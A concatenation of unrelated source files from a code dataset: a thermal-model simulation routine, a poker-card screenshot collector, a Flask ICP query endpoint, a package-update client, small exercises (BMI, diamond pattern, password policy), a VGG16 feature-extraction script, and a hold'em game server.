`run_state_pairs` threads in parallel via\n the multiprocessing package\n :type shared_data: multiprocessing.managers.ListProxy, optoinal\n :returns: Structured numpy array of results\n :rtype: np.ndarray\n\n State Pairs Data Structure:\n\n The state pairs data structure, `state_pairs`, are pairs of dictionaries specifying the two conditions used for a\n Timbre simulation. The keys in these dictionaries must match the Xija component names they refer to (e.g. 'pitch',\n 'ccd_count', 'cossrbx_on', etc.).\n\n State information that does not change from dwell1 to dwell2 can be specified in the model initialization\n dictionary. `init`. State information that does change from dwell1 to dwell2 should be specified in the state pairs\n dictionary described above. Dictionary names for states should match those expected by Xija (e.g. 
fep_count, roll,\n sim_z).\n\n Example::\n\n model_init = {'aacccdpt': {'aacccdpt': -7., 'aca0': -7., 'eclipse': False}, }\n model_specs = load_model_specs()\n date = '2021:001:00:00:00'\n t_dwell1 = 20000.\n msid = 'aacccdpt'\n limit = -7.1\n state_pairs = (({'pitch': 144.2}, {'pitch': 154.95}),\n ({'pitch': 90.2}, {'pitch': 148.95}),\n ({'pitch': 50}, {'pitch': 140}),\n ({'pitch': 90}, {'pitch': 100}),\n ({'pitch': 75}, {'pitch': 130}),\n ({'pitch': 170}, {'pitch': 90}),\n ({'pitch': 90}, {'pitch': 170}))\n state_pair_dtype = {'pitch', float}\n\n results = run_state_pairs(msid, model_specs[msid], model_init[msid], limit, date, t_dwell1, state_pairs,\n state_pair_dtype)\n \"\"\"\n\n non_state_names = {'aacccdpt': ['aca0', ],\n 'pftank2t': ['pf0tank2t', ],\n '4rt700t': ['oba0', ],\n 'pline03t': ['pline03t0', ],\n 'pline04t': ['pline04t0', ],\n 'pm1thv2t': ['mups0', ],\n 'pm2thv1t': ['mups0', 'mups1'],\n '1deamzt': ['dea0', ],\n '1dpamzt': ['dpa0', ],\n 'fptemp': ['fptemp', '1cbat', 'sim_px'],\n '1pdeaat': ['pin1at', ],\n '2ceahvpt': ['cea0', 'cea1']}\n\n base_dtype = [('msid', 'U20'),\n ('date', 'U8'),\n ('datesecs', float),\n ('limit', float),\n ('t_dwell1', float),\n ('t_dwell2', float),\n ('min_temp', float),\n ('mean_temp', float),\n ('max_temp', float),\n ('min_pseudo', float),\n ('mean_pseudo', float),\n ('max_pseudo', float),\n ('converged', bool),\n ('unconverged_hot', bool),\n ('unconverged_cold', bool),\n ('hotter_state', np.int8),\n ('colder_state', np.int8)]\n\n duration = 30 * 24 * 3600.\n t_backoff = 2 * duration / 3\n datestr = CxoTime(date).date[:8]\n datesecs = CxoTime(date).secs\n msid = msid.lower()\n\n results = []\n\n num = float(len(state_pairs))\n for n, pair in enumerate(state_pairs):\n\n if print_progress and (np.mod(n, 1000) == 0):\n print(\"Running simulations for state pair #: {} out of {}\".format(n + 1, num))\n\n dwell1_state = pair[0]\n dwell2_state = pair[1]\n\n dwell_results = find_second_dwell(date, dwell1_state, dwell2_state, dwell_1_duration, msid, limit, model_spec,\n init, limit_type=limit_type, duration=duration, t_backoff=t_backoff,\n n_dwells=n_dwells, min_dwell=min_dwell, max_dwell=max_dwell, pseudo=None)\n\n row = [msid.encode('utf-8'),\n datestr.encode('utf-8'),\n datesecs,\n limit,\n dwell_1_duration,\n dwell_results['dwell_2_time'],\n dwell_results['min_temp'],\n dwell_results['mean_temp'],\n dwell_results['max_temp'],\n dwell_results['min_pseudo'],\n dwell_results['mean_pseudo'],\n dwell_results['max_pseudo'],\n dwell_results['converged'],\n dwell_results['unconverged_hot'],\n dwell_results['unconverged_cold'],\n dwell_results['hotter_state'],\n dwell_results['colder_state']]\n\n for key, value in init.items():\n if key not in non_state_names[msid] and key not in dwell1_state and key not in msid:\n dwell1_state[key] = value\n dwell2_state[key] = value\n\n state_dtype = []\n for key, value in dwell1_state.items():\n row.append(value)\n state_dtype.append((key.lower() + '1', type(value)))\n\n for key, value in dwell2_state.items():\n row.append(value)\n state_dtype.append((key.lower() + '2', type(value)))\n\n results.append(tuple(row))\n\n dtype = base_dtype + state_dtype\n results_array = np.array(results, dtype=dtype)\n\n if shared_data is not None:\n shared_data.append(results_array)\n else:\n return results_array\n","sub_path":"timbre/timbre.py","file_name":"timbre.py","file_ext":"py","file_size_in_byte":38621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"31305265","text":"import 
mss\nimport mss.tools\nimport uuid\nimport time\n\nif __name__ == \"__main__\":\n with mss.mss() as sct:\n monitor1 = {'top':828, 'left':1180, 'width':30, 'height':72}\n monitor2 = {'top':828, 'left':1285, 'width':30, 'height':72}\n monitor3 = {'top':540, 'left':1005, 'width':30, 'height':72}\n monitor4 = {'top':540, 'left':1119, 'width':30, 'height':72}\n monitor5 = {'top':540, 'left':1233, 'width':30, 'height':72}\n monitor6 = {'top':540, 'left':1347, 'width':30, 'height':72}\n monitor7 = {'top':540, 'left':1461, 'width':30, 'height':72}\n\n for i in range (508, 10000):\n sct_1 = sct.grab(monitor1)\n sct_2 = sct.grab(monitor2)\n sct_3 = sct.grab(monitor3)\n sct_4 = sct.grab(monitor4)\n sct_5 = sct.grab(monitor5)\n sct_6 = sct.grab(monitor6)\n sct_7 = sct.grab(monitor7)\n\n mss.tools.to_png(sct_1.rgb, sct_1.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-7))\n mss.tools.to_png(sct_2.rgb, sct_2.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-6))\n mss.tools.to_png(sct_3.rgb, sct_3.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-5))\n mss.tools.to_png(sct_4.rgb, sct_4.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-4))\n mss.tools.to_png(sct_5.rgb, sct_5.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-3))\n mss.tools.to_png(sct_6.rgb, sct_6.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-2))\n mss.tools.to_png(sct_7.rgb, sct_7.size, output='C:/Users/Devin/Desktop/PokerBot/CardsImages/Hole_Card_{}.png'.format(i*7-1))\n print (\"Taking screenshots\") \n time.sleep(20)\n","sub_path":"RecognitionDataCollector.py","file_name":"RecognitionDataCollector.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"70254105","text":"from flask import Blueprint, jsonify\nfrom webargs.flaskparser import use_args\n\nfrom project.api.bizs import IcpBiz\nfrom project.api.schemas.icp import query_icp_schema\n\nicp_blueprint = Blueprint('icp', __name__)\npayload_location = ('json',)\n\n\n@icp_blueprint.route('/icp/captcha', methods=['GET'])\ndef get_icp_captcha():\n icp_biz = IcpBiz()\n data = icp_biz.get_captcha()\n return jsonify({\n 'status': True,\n 'data': data\n }), 200\n\n\n@icp_blueprint.route('/icp/query', methods=['POST'])\n@use_args(query_icp_schema, locations=payload_location)\ndef query_icp(payload):\n \"\"\"查询备案信息:先查工信部|若工信部出错查本地库\"\"\"\n\n icp_biz = IcpBiz()\n result = icp_biz.query(**payload)\n print(\"备案查询结果为:\", result)\n\n # 查备案信息成功 | 用备案单位识别归属地信息\n result['data'] = result.get('data', {})\n if result['data'].get('sponsor', '') and result['data'].get('sponsor') != '未备案':\n area = icp_biz.recognize_area(result['data']['sponsor'])\n else:\n area = {'city': '', 'city_code': None, 'region': '', 'region_code': None}\n print(\"识别的归属地信息为:\", area)\n result['data'].update(area)\n return jsonify({\n 'status': True,\n 'data': result\n }), 201\n","sub_path":"project/api/views/icp.py","file_name":"icp.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"204551181","text":"import json\nimport platform\nimport requests\nimport psutil\nimport shutil\nimport os\nimport tarfile\nimport time\nimport sys\nfrom distutils.version import LooseVersion\nfrom UpdateInfo import PackageInfo, 
ClientInfo\nfrom threading import Thread\n\nserver_url = \"http://localhost:5000\"\ninternal_id = -1\nclient_active = False\nroot_path = os.path.dirname(os.path.realpath(sys.argv[0]))\ninstallDir = os.path.abspath(os.path.join(root_path, '..', 'download'))\n\ninstalledPackages = dict()\n\ninstalledPackages[\"TextEdit_x86_64\"] = PackageInfo(\"TextEdit\", \"A simple text editor\", \"1.1.2\")\ninstalledPackages[\"MediaPlayer_x86_64\"] = PackageInfo(\"MediaPlayer\", \"A simple media player\", \"0.9.5\")\ninstalledPackages[\"lib_media_x86_64\"] = PackageInfo(\"lib_media\", \"basic media de- and encoding functions\", \"0.2.1\")\n\nfor pkg in installedPackages.values():\n pkg.architecture = \"x86_64\"\n\n\ndef register_client():\n \"\"\"\n Registers this client with the server and saves the provided client-id \n \"\"\"\n global internal_id\n headers = {'Content-type': 'application/json'}\n payload = ClientInfo(platform.platform(),\n platform.processor() + \" (\"+str(psutil.cpu_count())+\" cores)\",\n str(round(float(psutil.virtual_memory()[0])/(1024*1024*1024), 2)) + \" GB\",\n platform.machine(),\n internal_id).__dict__\n r = requests.put(server_url + \"/registerClient\", headers=headers, data=json.dumps(payload))\n if r.status_code != 200:\n print(\"ERROR\", r.status_code, r.reason)\n return\n if internal_id == -1:\n print(\"\\nsuccessfully registered with server at \"+server_url)\n internal_id = r.json()\n\n\ndef get_package_list():\n \"\"\"\n Requests the list of available server packages and prints them \n \"\"\"\n headers = {'Content-type': 'application/json'}\n payload = json.dumps(internal_id)\n r = requests.get(server_url + \"/packages\", headers=headers, data=payload)\n if r.status_code != 200:\n print(\"ERROR\", r.status_code, r.reason)\n return\n pkg_list = json.loads(r.json())\n for obj in pkg_list:\n p = PackageInfo.from_dict(obj)\n print(p.name, p.version, p.dependencies, p.architecture)\n\n\ndef request_updates():\n \"\"\"\n Requests the list of available updates, based on the currently installed packages\n \"\"\"\n headers = {'Content-type': 'application/json'}\n payload = json.dumps([ob.__dict__ for ob in installedPackages.values()])\n r = requests.get(server_url + \"/requestUpdates\", headers=headers, data=json.dumps([internal_id, payload]))\n\n if r.status_code != 200:\n print(\"ERROR\", r.status_code, r.reason)\n return\n print(\"Available Updates:\")\n try:\n pkg_list = json.loads(r.json())\n for obj in pkg_list:\n p = PackageInfo.from_dict(obj)\n print(p.name, p.version, p.dependencies)\n except ValueError:\n print(\"error\")\n\n\ndef request_package(name, indent=\"\"):\n \"\"\"\n Requests a specific package from the server, downloads it and installs it to the 'downloads' directory.\n Does NOT check whether the package is already installed. 
Overwrites installed version of the package.\n :param name: the package name\n :param indent: indentation string, used for cleaner output in recursive dependency requests\n \"\"\"\n global installedPackages\n key_name = name + \"_\" + platform.machine()\n print(indent+\"requesting '\" + key_name + \"'\")\n headers = {'Content-type': 'application/json'}\n payload = json.dumps(name+\"_\"+platform.machine())\n r = requests.get(server_url + \"/requestPackage\", headers=headers, data=json.dumps([internal_id, payload]), stream=True)\n\n if r.status_code == 200:\n\n dependencies = json.loads(r.headers['required-dependencies'])\n for dep in dependencies:\n req_v = dep.split(\",\")\n if len(req_v) > 1:\n req = req_v[1]\n dep = req_v[0]\n try:\n p_key = dep+\"_\"+platform.machine()\n\n if installedPackages[p_key]:\n if len(req_v) > 1:\n if req.startswith(\">=\"):\n need_update = LooseVersion(req.replace(\">=\", \"\")) > LooseVersion(installedPackages[p_key].version)\n elif req.startswith(\">\"):\n need_update = LooseVersion(req.replace(\">\", \"\")) >= LooseVersion(installedPackages[p_key].version)\n else:\n print(indent+\" unable to parse version requirement\",\n \"'\" + req + \"'. assuming package is outdated\")\n if not request_package(dep, \" \"+indent):\n print(indent+\"installation of '\" + name + \"'failed\")\n return False\n break\n if need_update:\n print(indent+\" required dependency '\" + dep + \"' needs update:\",\n installedPackages[p_key].version, \"is not\", req)\n if not request_package(dep, \" \"+indent):\n print(indent+\"installation of '\" + name + \"'failed\")\n return False\n else:\n print(indent+\" required dependency '\" + dep + \"' already installed!\")\n else:\n print(indent + \" required dependency '\" + dep + \"' already installed!\")\n except KeyError:\n print(indent+\" required dependency '\" + dep + \"' not installed\")\n if not request_package(dep, \" \" + indent):\n print(indent+\"installation of '\" + name + \"'failed\")\n return False\n\n down_dir = installDir\n file_name = r.headers['content-disposition']\n pkg_dir = os.path.join(down_dir, name)\n full_path = os.path.join(down_dir, file_name)\n\n version = r.headers['package-version']\n desc = r.headers['package-description']\n\n if not os.path.exists(down_dir):\n os.makedirs(down_dir)\n\n if os.path.exists(pkg_dir):\n shutil.rmtree(pkg_dir)\n\n os.makedirs(pkg_dir)\n\n with open(full_path, 'wb') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n print(indent+\" downloaded '\" + name + \"'\")\n\n tar = tarfile.open(full_path)\n tar.extractall(pkg_dir)\n tar.close()\n os.remove(full_path)\n\n installedPackages[key_name] = PackageInfo(name, desc, version)\n installedPackages[key_name].architecture = platform.machine()\n print(indent+\"successfully installed '\" + name + \"' to\", pkg_dir)\n return True\n else:\n print(indent+\"error trying to fetch package\")\n return False\n\n\ndef heartbeat():\n \"\"\"\n Periodically sends a heartbeat to the server\n \"\"\"\n global client_active\n ms = 100.0\n while client_active:\n ms_wait = 0.0\n while ms_wait < 8000.0:\n time.sleep(ms/1000.0)\n ms_wait += ms\n if not client_active:\n return\n register_client()\n\n\nif __name__ == '__main__':\n\n # read server address from arguments if provided\n if len(sys.argv) == 2:\n host = str(sys.argv[1])\n server_url = \"http://\"+host+\":5000\"\n print(\"set url to \" + server_url)\n\n # initially register this client with the server\n register_client()\n\n # start heartbeat thread\n client_active = True\n t = 
Thread(target=heartbeat)\n t.start()\n\n # read commands from the console until interrupt or 'exit' command\n while True:\n try:\n if sys.version_info >= (3, 0):\n response = input(\"Please enter a command: \")\n else:\n response = raw_input(\"Please enter a command: \")\n if response == \"auto\":\n \"\"\"\n demo-behavior:\n - fetch package -list\n - fetch updates\n - request \"WebBrowser\"-package\n - request \"MediaPlayer\"-package\n \"\"\"\n get_package_list()\n request_updates()\n request_package(\"WebBrowser\")\n request_package(\"MediaPlayer\")\n elif response == \"update\":\n request_updates()\n elif response == \"getpkgs\":\n get_package_list()\n elif response.startswith(\"request\"):\n package_name = response[len(\"request \"):]\n request_package(package_name)\n elif response == \"exit\":\n break\n elif response == \"help\":\n print(\"commands:\")\n print(\"auto\\ngetpkgs\\nrequest [pkgname]\\nupdate\\nexit\\nhelp\")\n except KeyboardInterrupt:\n print(\"\\nexiting\")\n break\n except Exception as e:\n print(\"Unexpected error:\", e)\n break\n\n client_active = False\n t.join()\n\n","sub_path":"src/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":9166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"407940978","text":"from functools import wraps\nimport time\nimport requests\n\n\ndef check_cmc():\n cmcurl = 'csgcmc.qa.webex.com'\n try:\n res = requests.get(f\"https://{cmcurl}/cmc/api/healthcheck/\").json()\n ret = res['result']\n except Exception as e:\n # print(f\"CMC {cmcurl} is not available due to {e}\")\n ret = \"NONONO\"\n if ret == \"OKOKOK\":\n return True\n else:\n return False\n\n\ndef is_cmc_available(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n print(\"checking cmc ...\")\n cmcurl = args[0]\n try:\n res = requests.get(f\"https://{cmcurl}/cmc/api/healthcheck/\").json()\n ret = res['result']\n except Exception as e:\n # print(f\"CMC {cmcurl} is not available due to {e}\")\n ret = \"NONONO\"\n if ret != \"OKOKOK\":\n print(\"cmc error\")\n else:\n func(*args, **kwargs)\n\n return wrapper\n\n\n@is_cmc_available\ndef test(cmculr, x):\n print(f\"sleep1 {x}...\")\n time.sleep(x)\n print(\"sleep2...\")\n\n\ntest('csgcmc.qa.webex.com1', 3)\n","sub_path":"decorator_s.py","file_name":"decorator_s.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"285622144","text":"val = 0\n\n\ndef bmi(masa, wzrost):\n val = round(masa/(wzrost*wzrost), 2)\n print ('Twój wskaźnik BMI wynosi ' + str(val) + '.')\n return val\n\n\nprint('Podaj wagę w kg')\nA=int(input())\n\nprint('Podaj wzrost w cm')\nB=int(input())/100\n\n\ndef komentarz(bmi):\n if bmi < 18.5:\n print('Niedowaga')\n elif bmi < 24.99:\n print('Norma')\n else:\n print('Nadwaga')\n\n\nkomentarz(bmi(A, B))\n","sub_path":"1bmi.py","file_name":"1bmi.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"42294293","text":"def ndiamond():\r\n\tn=5\r\n\tu=int(n/2)+1 #number of rows in the upper triangle\r\n\tl=int(n/2) #number of rows in the lower tirangle\r\n\tk=1\r\n\tfor i in range(u): #for the upper triangle\r\n\t\tk=1\r\n\t\tfor j in range(u-1-i): #printing spaces \r\n\t\t\tprint(\" \",end=\"\")\r\n\t\tfor j in range(2*i+1): #for printing the numbers 2n-1 times for the nth row n>=0\r\n\t\t\tprint(k,end=\"\") #now we print k which starts from 1 k increases untill 
i==j then it decreases\r\n\t\t\tif j= i[\"min\"]:\n valid += 1\n \n print(\"Part1\", valid)\n \ndef part2(input):\n valid = 0\n for i in input:\n index1, index2 = map(lambda n: n - 1, [i[\"min\"], i[\"max\"]])\n if (i[\"text\"][index1] == i[\"letter\"]) ^ (i[\"text\"][index2] == i[\"letter\"]):\n valid+= 1\n\n print(\"Part2\", valid)\n\n\nif __name__ == \"__main__\":\n f = open(file)\n input = []\n\n for line in f.readlines():\n rule, text = line.split(\":\")\n min, rest = rule.split(\"-\")\n max, letter = rest.split(\" \")\n input.append({\n \"min\": int(min),\n \"max\": int(max),\n \"letter\":letter,\n \"text\": text.strip()\n })\n\n part1(input)\n part2(input)\n \n","sub_path":"day02/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"51966499","text":"# -*- coding: utf-8 -*-\n\nglobal try_y_train\nglobal try_X_train\nglobal try_X_test\nglobal try_y_test \nimport argparse\nimport os\nimport time\n\nfrom PIL import Image\n\nimport numpy as np\n\nfrom sklearn.svm import LinearSVC\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.utils.data\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nimport torchvision\n\nmodels.vgg.model_urls[\"vgg16\"] = \"http://webia.lip6.fr/~robert/cours/rdfia/vgg16-397923af.pth\"\nos.environ[\"TORCH_MODEL_ZOO\"] = \"/tmp/torch\"\nPRINT_INTERVAL = 20\nCUDA = False\n\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self, keep_all=False):\n self.reset()\n self.data = None\n if keep_all:\n self.data = []\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n if self.data is not None:\n self.data.append(val)\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\n\n\ndef get_dataset(batch_size, path):\n \"\"\"\n Cette fonction charge le dataset et effectue des transformations sur chaqu\n \"\"\"\n train_dataset = datasets.ImageFolder(path+'/train',\n transform=transforms.Compose([ # TODO Pre-traitement a faire\n transforms.Lambda(lambda x: x.resize((224, 224,))),\n transforms.ToTensor(),\n transforms.Normalize((0.495, 0.456, 0.406,), (0.229, 0.224, 0.225,))\n ]))\n val_dataset = datasets.ImageFolder(path+'/test',\n transform=transforms.Compose([ # TODO Pre-traitement a faire\n transforms.Lambda(lambda x: x.resize((224, 224,))),\n transforms.ToTensor(),\n transforms.Normalize((0.495, 0.456, 0.406,), (0.229, 0.224, 0.225,))\n ]))\n\n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=batch_size, shuffle=False, pin_memory=CUDA, num_workers=2)\n val_loader = torch.utils.data.DataLoader(val_dataset,\n batch_size=batch_size, shuffle=False, pin_memory=CUDA, num_workers=2)\n\n return train_loader, val_loader\n\ndef epoch(data, model, criterion, optimizer=None):\n 
model.eval() if optimizer is None else model.train()\n\n t_X, t_y = [], []\n print(model)\n for i, (input, target) in enumerate(data):\n input = Variable(input)\n target = Variable(target)\n\n if CUDA:\n input = input.cuda()\n target = target.cuda()\n\n output = model.forward(input)\n loss = criterion(output, target)\n\n # backward si on est en \"train\"\n if optimizer:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n\n\n if i % PRINT_INTERVAL == 0:\n print('Batch {0:03d}/{1:03d}'.format(i, len(data)))\n # TODO Feature extraction a faire\n #print(input.data.shape)\n t_X.append(model.forward(input).data.cpu().numpy())\n t_y.append(target)\n\n\n print(\"accuracy: \", accuracy(output.data, target.data, topk=(1, 5)))\n # backward si on est en \"train\"\n if optimizer:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n\n return t_X, t_y\n\n\ndef main(params):\n print('Instanciation de VGG16')\n vgg16 = models.vgg16(pretrained=True)\n\n class VGG16relu7(nn.Module):\n def __init__(self):\n super(VGG16relu7, self).__init__()\n # recopier toute la partie convolutionnelle\n self.features = nn.Sequential(\n *list(vgg16.features.children()))\n # garder une partie du classifieur, -2 pour s’arreter a relu7\n # self.classifier = nn.Sequential(*list(vgg16.classifier.children())[:-2])\n\n self.classifier = nn.Sequential(\n nn.Linear(25088, 4096),\n nn.ReLU(), \n nn.Dropout(p=0.5),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, 10),\n nn.ReLU()\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.classifier(x)\n return x\n\n print('Instanciation de VGG16relu7')\n model = VGG16relu7() # TODO À remplacer pour feature extraction\n\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), 0.01, momentum=0)#.9)\n\n # model = torchvision.models.squeezenet1_1(pretrained=True)\n model.eval()\n if CUDA: # si on fait du GPU, passage en CUDA\n model = model.cuda()\n\n # On récupère les données\n print('Récupération des données')\n train, test = get_dataset(params.batch_size, params.path)\n #train, test = Variable(train), Variable(test)\n\n # Extraction des features\n print('Feature extraction')\n for i in range(5):\n X_train, y_train = epoch(train, model, criterion, optimizer)\n X_test, y_test = epoch(test, model, criterion)\n\n\n # TODO Apprentissage et évaluation des SVM à faire\n print('Apprentissage des SVM')\n svm = LinearSVC(C=1.0)\n print(svm)\n print(type(X_train), type(y_train))\n y_train = [k.data.cpu().numpy() for k in y_train]\n y_test = [k.data.cpu().numpy() for k in y_test]\n\n try_y_train = y_train\n try_X_train = X_train\n try_X_test = X_test\n try_y_test = y_test\n\n\n X_train = np.concatenate(tuple([k for k in X_train]))\n y_train = np.concatenate(tuple([k for k in y_train]))\n X_test = np.concatenate(tuple([k for k in X_test]))\n y_test = np.concatenate(tuple([k for k in y_test]))\n print(X_train, y_train)\n print(X_train[-1].shape, y_train[-1].shape)\n svm.fit(X_train, y_train)\n accuracy = svm.score(X_test, y_test)\n print(\"accuracy:\", accuracy)\n\nif __name__ == '__main__':\n\n # Paramètres en ligne de commande\n parser = argparse.ArgumentParser()\n parser.add_argument('--path', default='15SceneData/', type=str, metavar='DIR', help='path to dataset')\n parser.add_argument('--batch-size', default=4, type=int, metavar='N', help='mini-batch size (default: 8)')\n parser.add_argument('--cuda', dest='cuda', action='store_false', help='activate GPU acceleration')\n\n args = parser.parse_args()\n 
if args.cuda:\n CUDA = True\n cudnn.benchmark = True\n else:\n CUDA = False\n print(CUDA)\n\n main(args)\n\n input(\"done\")\n","sub_path":"TME-code/TME_9/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"373839920","text":"import copy\nimport time\nimport json\nimport socket\nimport random\nfrom collections import defaultdict\nimport multiprocessing\nfrom multiprocessing import reduction\nfrom operator import itemgetter\nimport threading\nimport gevent\nimport gevent.monkey\ngevent.monkey.patch_all()\nimport gipc\n\nfrom utils import utils, hint, err\nfrom utils.logs import logger\nfrom utils.config import cfg\nfrom games.nolimitholdem.game import Game as holdem_game\nfrom database import rabbitmq, mysql\n\n\nclass Player():\n def __init__(self, sock, name=None):\n self.name = name\n self.sock = sock\n self.session = 0\n self.times = 0\n\n def update_session(self, money):\n self.times += 1\n self.session += money\n\n def print_session(self):\n print(f'{self.name} : {self.session} after {self.times} matchs, {self.session * 10 / self.times} mbb/g')\n\n def notify(self, data):\n utils.sendJson(self.sock, data)\n\n def recv(self):\n data = utils.recvJson(self.sock)\n return data\n \n def finish(self):\n try:\n self.sock.shutdown(socket.SHUT_RDWR)\n except Exception:\n pass\n self.sock.close()\n\n\nclass Game():\n def __init__(self, room_id, room_number, game_number, names, socks, db, observer_queue, room_end_queue, is_ai, save_db):\n self.room_id = room_id\n self.room_number = room_number\n self.game_number = game_number\n self.players = []\n self.observers = []\n for name, sock in zip(names, socks):\n self.players.append(Player(sock, name))\n self.db = db\n self.observer_queue = observer_queue\n self.room_end_queue = room_end_queue\n self.is_ai = is_ai\n self.save_db = save_db\n\n def retrive_observer(self):\n while self.observer_queue[self.room_id]:\n sock = self.observer_queue[self.room_id].pop(0)\n self.observers.append(Player(sock))\n\n def run(self):\n try:\n self.work()\n except Exception as e:\n logger.exception(e)\n self.tear_down(hint.unknown_error_info(repr(e)))\n \n def work(self):\n BUG = False\n if len(self.players) == 2 and not self.is_ai:\n BUG = False\n if BUG: \n pass\n else:\n random.shuffle(self.players)\n \n error_info = None\n self.record_game = holdem_game(self.room_number)\n for game_count in range(1, self.game_number + 1):\n self.gid = utils.gen_id()\n self.aid = utils.gen_id()\n if not self.is_ai or self.is_ai and game_count % self.room_number == 1:\n if BUG:\n self.record_player = self.record_game.game_init(game_count - 1)\n else:\n self.record_player = self.record_game.game_init()\n player_id = self.record_player\n self.game = copy.deepcopy(self.record_game)\n while not self.game.is_terminal():\n self.retrive_observer()\n self.notify_state()\n data = self.players[player_id].recv()\n if data is None or \"aid\" not in data:\n self.aid = utils.gen_id()\n else:\n self.aid = data[\"aid\"]\n if data is None:\n error_info = hint.disconnect_info(self.players[player_id].name)\n action = \"fold\"\n else:\n try:\n action = data[\"action\"] \n except Exception as e:\n error_info = hint.no_action_info(self.players[player_id].name)\n action = \"fold\"\n try:\n player_id = self.game.step(action)\n except err.InvalidActionError as e:\n error_info = hint.invalid_action_info(self.players[player_id].name, e.action)\n player_id = 
self.game.step(\"fold\")\n\n self.notify_state(last=True)\n self.notify_result()\n \n if self.save_db:\n self.save_data()\n \n if error_info is not None:\n self.tear_down(error_info)\n return\n \n for player in self.players:\n data = player.recv()\n if data is None:\n self.tear_down(hint.disconnect_info(player.name))\n return\n if data[\"info\"] != \"ready\":\n self.tear_down(hint.player_exit_info(player.name))\n return\n player = self.players.pop(0)\n self.players.append(player)\n\n self.tear_down(hint.play_compelete_info)\n \n def save_data(self):\n message = self.game.get_save_data()\n message['name'] = [p.name for p in self.players]\n message['position'] = [i for i in range(len(self.players))]\n message['room_id'] = self.room_id\n message[\"gid\"] = self.gid\n self.db.save(message)\n\n def tear_down(self, info=None):\n self.add_id(info)\n for player in [*self.players, *self.observers]:\n player.notify(info)\n for player in [*self.players, *self.observers]:\n player.finish()\n if info[\"info\"] != \"success\":\n logger.warning(\"room {}, {}\", self.room_id, info[\"text\"])\n self.room_end_queue.put(self.room_id)\n\n def add_id(self, state):\n state[\"gid\"] = self.gid\n state[\"aid\"] = self.aid\n\n def notify_state(self, last=False):\n for i, player in enumerate(self.players):\n state = self.game.get_state(i)\n self.add_id(state)\n for j, p in enumerate(self.players):\n state['players'][j]['name'] = p.name\n state['info'] = 'state'\n if last:\n state['action_position'] = -1\n player.notify(state)\n\n state = self.game.get_public_state()\n self.add_id(state)\n if last:\n state['action_position'] = -1\n state['info'] = 'state'\n for j, p in enumerate(self.players):\n state['players'][j]['name'] = p.name\n for observer in self.observers:\n observer.notify(state)\n \n def notify_result(self):\n for i, player in enumerate(self.players):\n state = self.game.get_payoff(i)\n self.add_id(state)\n state['info'] = 'result'\n for j, p in enumerate(self.players):\n state['players'][j]['name'] = p.name\n player.notify(state)\n player.update_session(state['players'][i]['win_money'])\n\n state = self.game.get_payoff()\n self.add_id(state)\n state['info'] = 'result'\n state['total_money'] = [p.session for p in self.players]\n state['times'] = [p.times for p in self.players]\n for j, p in enumerate(self.players):\n state['players'][j]['name'] = p.name\n for observer in self.observers:\n observer.notify(state)\n\ndef worker_main(socket_reader, data_reader, room_end_queue, db, observer_queue):\n while True:\n data = data_reader.get()\n if data[\"info\"] == \"room\":\n room_id, room_number, game_number, names, is_ai, save_db = data[\"data\"]\n socks = []\n for i in range(room_number):\n socket_reader.poll(None)\n sock = socket.fromfd(reduction.recv_handle(socket_reader), socket.AF_INET, socket.SOCK_STREAM)\n socks.append(sock)\n game = Game(room_id, room_number, game_number, names, socks, db, observer_queue, room_end_queue, is_ai, save_db)\n gevent.spawn(game.run)\n\n if data[\"info\"] == \"observer\":\n 